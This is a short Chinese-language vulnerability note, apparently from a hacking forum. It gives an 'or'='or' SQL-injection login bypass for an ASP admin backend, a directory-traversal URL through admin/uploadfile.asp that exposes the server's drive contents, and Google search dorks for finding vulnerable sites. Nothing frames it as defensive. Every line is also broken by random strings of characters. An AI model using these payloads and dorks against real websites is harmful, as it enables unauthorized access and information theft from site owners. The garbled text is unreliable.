后台万能密码 'or'='or'! w& R7 p p9 q; K
u6 E5 `3 B2 B6 y% t后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 ?: n: [7 y" ^5 N7 J
admin/uploadfile.asp?currentFolder=/upfiles/../' M3 E8 M9 _3 A* H$ s! w
2 l- H; m6 t! t" A: O漏洞证明:
/ k8 v7 u" {8 Y- o8 {! l) R/ W* q2 {7 A; L' P
谷歌:inurl:type.asp?id=1 新闻中心" ^1 n1 x' |- b9 n( t
或者 :inurl:download_ok.asp?6 I( u4 H/ _0 V2 q$ M* Q4 n; i
$ T0 p7 [, b: R! k |